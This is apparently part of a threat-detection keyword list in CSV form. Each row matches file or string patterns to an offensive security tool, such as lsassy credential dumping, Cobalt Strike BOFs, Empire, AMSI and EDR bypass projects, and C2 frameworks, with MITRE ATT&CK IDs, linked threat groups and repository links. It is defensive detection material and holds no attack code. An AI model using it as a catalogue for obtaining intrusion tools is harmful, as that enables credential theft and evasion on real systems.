+"*test_lsassy.*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*test_mitm_initialization.py*","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z" +"*test_nanodump_exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*test_pacu_update.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*test_tezos2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*TestConsoleApp_YSONET*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*Test-ContainsAmsiPSTokenSignatures -*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*Test-DllExists*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Test-DllExists*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*tester@egress-assess.com*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*testHeapOverflow.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Test-HijackableDll*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*testing* testing* 1* 2* 3 *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*Test-ServiceDaclPermission*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Test-ServiceDaclPermission*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Test-ServiceDaclPermission*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*TestWinRMMachines*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*tevora-threat/SharpView/*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" +"*text_to_shellcode\*.exe*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","0","N/A","N/A",,"N/A",,, +"*TexttoExe.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*tezos2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*tgscrack.go*","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","2","180","57","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" +"*tgsrepcrack.*","offensive_tool_keyword","AD exploitation cheat sheet","Crack with TGSRepCrack","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*tgsrepcrack.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" +"*TGSThief-main*","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","129","18","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" +"*tgtdelegation *","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*tgtdelegation.cna*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*tgtdelegation.x64*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*tgtdelegation.x86*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*tgtParse.py *","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*th3rd/heroinn*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" +"*TH3xACE/EDR-Test*","offensive_tool_keyword","EDR-Test","Automating EDR Testing with reference to MITRE ATTACK via Cobalt Strike [Purple Team].","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TH3xACE/EDR-Test","1","1","N/A","N/A","2","140","19","2023-03-27T11:39:32Z","2022-03-27T08:58:49Z" +"*thc-hydra*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*thc-hydra.git*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*thc-hydra.git*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*the-backdoor-factory-master*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*TheD1rkMtr/AMSI_patch*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" +"*TheD1rkMtr/D1rkInject*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" +"*TheD1rkMtr/DocPlz*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*TheD1rkMtr/GithubC2*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","1","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" +"*TheD1rkMtr/HeapCrypt*","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","224","40","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" +"*TheD1rkMtr/NTDLLReflection*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" +"*TheD1rkMtr/Pspersist*","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0005 ","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","10","1","72","17","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" +"*TheD1rkMtr/Shellcode-Hide*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*TheD1rkMtr/StackCrypt*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" +"*TheD1rkMtr/UnhookingPatch*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*TheGejr/SpringShell*","offensive_tool_keyword","Spring4Shell","Spring4Shell Proof Of Concept/Information CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/TheGejr/SpringShell","1","1","N/A","N/A","2","124","86","2022-04-04T14:09:11Z","2022-03-30T17:05:46Z" +"*theHarvester*","offensive_tool_keyword","theHarvester","E-mails. subdomains and names Harvester.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/laramies/theHarvester","1","0","N/A","N/A","10","9256","1843","2023-10-02T22:12:14Z","2011-01-01T20:40:15Z" +"*thelinuxchoice/tweetshell*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"*ThemeBleed.exe *","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","28","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" +"*ThePorgs/Exegol-images*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*therealwover@protonmail.com*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*thewover/donut*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*thief.py -*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" +"*third_party/SharpGen*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*third-party*winvnc*.dll*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 